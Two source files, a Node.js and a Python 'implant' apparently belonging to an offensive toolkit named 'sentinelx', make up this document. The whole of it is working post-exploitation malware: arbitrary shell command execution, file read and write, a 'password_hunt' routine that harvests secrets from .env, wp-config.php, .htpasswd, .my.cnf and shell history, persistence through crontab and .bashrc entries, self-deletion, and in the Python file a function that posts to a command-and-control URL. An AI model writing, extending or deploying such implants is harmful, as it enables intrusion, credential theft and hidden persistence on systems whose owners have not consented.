File: payloads/implant.js
#!/usr/bin/env node
const http = require('http');
const https = require('https');
const { execSync } = require('child_process');
const fs = require('fs');
const path = require('path');
const os = require('os');

const AUTH_KEY = "sentinelx_2024";
const C2_URL = "";

function json(r) { process.stdout.write(JSON.stringify(r) + "\n"); }

function beacon() {
    json({ status: "ok", data: {
        hostname: os.hostname(), os: os.type() + " " + os.release(),
        node: process.version, user: os.userInfo().username,
        cwd: process.cwd(), arch: os.arch(), platform: os.platform(),
        mem_free: os.freemem(), mem_total: os.totalmem(),
        uptime: os.uptime(), cpus: os.cpus().length,
    }});
}

function execCmd(cmd) {
    try {
        const out = execSync(cmd, { encoding: 'utf8', timeout: 30000, shell: true });
        json({ status: "ok", output: out, cwd: process.cwd() });
    } catch(e) {
        json({ status: "ok", output: e.stdout + e.stderr, cwd: process.cwd() });
    }
}

function fileList(dir) {
    try {
        const items = fs.readdirSync(dir).filter(e => e !== '.' && e !== '..').map(e => {
            const fp = path.join(dir, e);
            const s = fs.statSync(fp);
            return { name: e, type: s.isDirectory() ? 'dir' : 'file', size: s.size };
        });
        json({ status: "ok", items, path: fs.realpathSync(dir) });
    } catch(e) { json({ status: "error", message: e.message }); }
}

function fileRead(p) {
    try {
        const data = fs.readFileSync(p);
        json({ status: "ok", content: data.toString('base64') });
    } catch(e) { json({ status: "error", message: e.message }); }
}

function fileWrite(p, content) {
    try {
        fs.writeFileSync(p, Buffer.from(content, 'base64'));
        json({ status: "ok", message: "Written" });
    } catch(e) { json({ status: "error", message: e.message }); }
}

function fileSearch(root, pattern, maxR) {
    const results = [];
    const fnmatch = require('fnmatch') || ((name, pat) => name.includes(pat.replace(/\*/g, '')));
    try {
        function walk(dir) {
            const entries = fs.readdirSync(dir);
            for (const e of entries) {
                if (results.length >= (maxR || 100)) break;
                const fp = path.join(dir, e);
                try {
                    const s = fs.statSync(fp);
                    if (s.isDirectory()) walk(fp);
                    else if (e.includes(pattern.replace('*', ''))) results.push({ name: e, path: fp, size: s.size });
                } catch {}
            }
        }
        walk(root);
        json({ status: "ok", results, count: results.length });
    } catch(e) { json({ status: "error", message: e.message }); }
}

function passwordHunt() {
    const hits = [];
    const targets = ['.env', 'config.php', 'wp-config.php', '.htpasswd', '.my.cnf', '.bash_history'];
    const roots = [process.cwd(), '/var/www/html', '/etc', os.homedir()];
    for (const root of roots) {
        if (!fs.existsSync(root)) continue;
        for (const t of targets) {
            const fp = path.join(root, t);
            if (!fs.existsSync(fp)) continue;
            try {
                const content = fs.readFileSync(fp, 'utf8');
                content.split('\n').forEach((line, i) => {
                    if (/password|pass|secret|key|db_pass/i.test(line)) {
                        hits.push({ file: fp, line: i + 1, match: line.trim().substring(0, 200) });
                    }
                });
            } catch {}
        }
    }
    json({ status: "ok", hits, count: hits.length });
}

function persistence(method) {
    const results = [];
    const self = __filename;
    if (method === 'cron' || method === 'all') {
        try {
            const cron = `* * * * * node ${self} >/dev/null 2>&1\n`;
            execSync(`(crontab -l 2>/dev/null; echo "${cron}") | crontab -`);
            results.push({ method: 'cron', status: 'installed' });
        } catch(e) { results.push({ method: 'cron', status: 'error', detail: e.message }); }
    }
    if (method === 'bashrc' || method === 'all') {
        try {
            const rc = path.join(os.homedir(), '.bashrc');
            fs.appendFileSync(rc, `\nnode ${self} >/dev/null 2>&1 &\n`);
            results.push({ method: 'bashrc', status: 'installed' });
        } catch(e) { results.push({ method: 'bashrc', status: 'error', detail: e.message }); }
    }
    json({ status: "ok", results });
}

function selfDestruct() {
    try { fs.unlinkSync(__filename); } catch {}
    json({ status: "ok" });
}

const action = process.argv[2] || 'beacon';
const arg1 = process.argv[3] || '';
const arg2 = process.argv[4] || '';

switch(action) {
    case 'beacon': beacon(); break;
    case 'exec': execCmd(process.argv.slice(3).join(' ')); break;
    case 'file_list': fileList(arg1 || '.'); break;
    case 'file_read': fileRead(arg1); break;
    case 'file_write': fileWrite(arg1, arg2); break;
    case 'file_search': fileSearch(arg1 || '/', arg2 || '*'); break;
    case 'password_hunt': passwordHunt(); break;
    case 'persistence': persistence(arg1 || 'all'); break;
    case 'self_destruct': selfDestruct(); break;
    default: json({ status: "error", message: "Unknown action" });
}

File: payloads/implant.py
#!/usr/bin/env python3
import json, os, sys, subprocess, base64, urllib.request, urllib.parse, shutil, glob, socket, struct, time, platform

AUTH_KEY = "sentinelx_2024"
C2_URL = ""
CWD = os.getcwd()

def req(data):
    if not C2_URL: return {"status": "error", "message": "No C2_URL"}
    if AUTH_KEY:
        req = urllib.request.Request(C2_URL + "/implant.php", urllib.parse.urlencode(data).encode())
        req.add_header("X-Auth", AUTH_KEY)
        try:
            res = urllib.request.urlopen(req, timeout=10)
            return json.loads(res.read())
        except: return {"status": "error", "message": "Connection failed"}
    return {"status": "error", "message": "No auth"}

def beacon():
    info = {
        "hostname": socket.gethostname(), "os": f"{platform.system()} {platform.release()}",
        "python": platform.python_version(), "user": os.environ.get("USER", os.environ.get("USERNAME", "?")),
        "cwd": os.getcwd(), "platform": platform.platform(), "arch": platform.machine(),
    }
    return {"status": "ok", "data": info}

def exec_cmd(cmd):
    try:
        r = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=30)
        out = r.stdout + r.stderr
        return {"status": "ok", "output": out, "cwd": os.getcwd()}
    except subprocess.TimeoutExpired:
        return {"status": "error", "message": "Timeout"}
    except Exception as e:
        return {"status": "error", "message": str(e)}

def file_list(path):
    items = []
    try:
        for e in os.listdir(path):
            fp = os.path.join(path, e)
            items.append({"name": e, "type": "dir" if os.path.isdir(fp) else "file", "size": os.path.getsize(fp) if os.path.isfile(fp) else 0})
    except: pass
    return {"status": "ok", "items": items, "path": os.path.realpath(path)}

def file_read(path):
    try:
        with open(path, "rb") as f: return {"status": "ok", "content": base64.b64encode(f.read()).decode()}
    except Exception as e: return {"status": "error", "message": str(e)}

def file_write(path, content):
    try:
        with open(path, "wb") as f: f.write(base64.b64decode(content))
        return {"status": "ok", "message": "Written"}
    except Exception as e: return {"status": "error", "message": str(e)}

def file_search(root, pattern, max_results=100):
    results = []
    import fnmatch
    for dirpath, _, files in os.walk(root):
        for f in files:
            if fnmatch.fnmatch(f, pattern):
                fp = os.path.join(dirpath, f)
                results.append({"name": f, "path": fp, "size": os.path.getsize(fp)})
                if len(results) >= max_results: break
        if len(results) >= max_results: break
    return {"status": "ok", "results": results, "count": len(results)}

def password_hunt():
    hits = []
    targets = [".env", "config.php", "wp-config.php", ".htpasswd", ".my.cnf", ".pgpass"]
    roots = [os.getcwd(), "/var/www/html", "/etc", os.path.expanduser("~")]
    for root in roots:
        if not os.path.isdir(root): continue
        for t in targets:
            fp = os.path.join(root, t)
            if os.path.isfile(fp):
                try:
                    with open(fp, "r", errors="ignore") as f: content = f.read()
                    for i, line in enumerate(content.split("\n"), 1):
                        if any(w in line.lower() for w in ["password", "pass", "secret", "key", "db_pass"]):
                            hits.append({"file": fp, "line": i, "match": line.strip()[:200]})
                except: pass
    return {"status": "ok", "hits": hits, "count": len(hits)}

def persistence(method):
    results = []
    if method in ("cron", "all"):
        crontab = f"* * * * * cd {CWD} && python3 {__file__} >/dev/null 2>&1\n"
        subprocess.run(f'(crontab -l 2>/dev/null; echo "{crontab}") | crontab -', shell=True)
        results.append({"method": "cron", "status": "installed"})
    if method in ("bashrc", "all"):
        rc = os.path.expanduser("~/.bashrc")
        with open(rc, "a") as f: f.write(f"\npython3 {__file__} >/dev/null 2>&1 &\n")
        results.append({"method": "bashrc", "status": "installed"})
    return {"status": "ok", "results": results}

def self_destruct():
    try: os.remove(__file__)
    except: pass
    return {"status": "ok"}

action = sys.argv[1] if len(sys.argv) > 1 else "beacon"
result = {"status": "error", "message": "Unknown action"}

if action == "beacon": result = beacon()
elif action == "exec": result = exec_cmd(" ".join(sys.argv[2:]) if len(sys.argv) > 2 else "")
elif action == "file_list": result = file_list(sys.argv[2] if len(sys.argv) > 2 else "/")
elif action == "file_read": result = file_read(sys.argv[2] if len(sys.argv) > 2 else "")
elif action == "file_write": result = file_write(sys.argv[2] if len(sys.argv) > 3 else "", sys.argv[3] if len(sys.argv) > 3 else "")
elif action == "file_search": result = file_search(sys.argv[2] if len(sys.argv) > 2 else "/", sys.argv[3] if len(sys.argv) > 3 else "*")
elif action == "password_hunt": result = password_hunt()
elif action == "persistence": result = persistence(sys.argv[2] if len(sys.argv) > 2 else "all")
elif action == "self_destruct": result = self_destruct()

print(json.dumps(result))
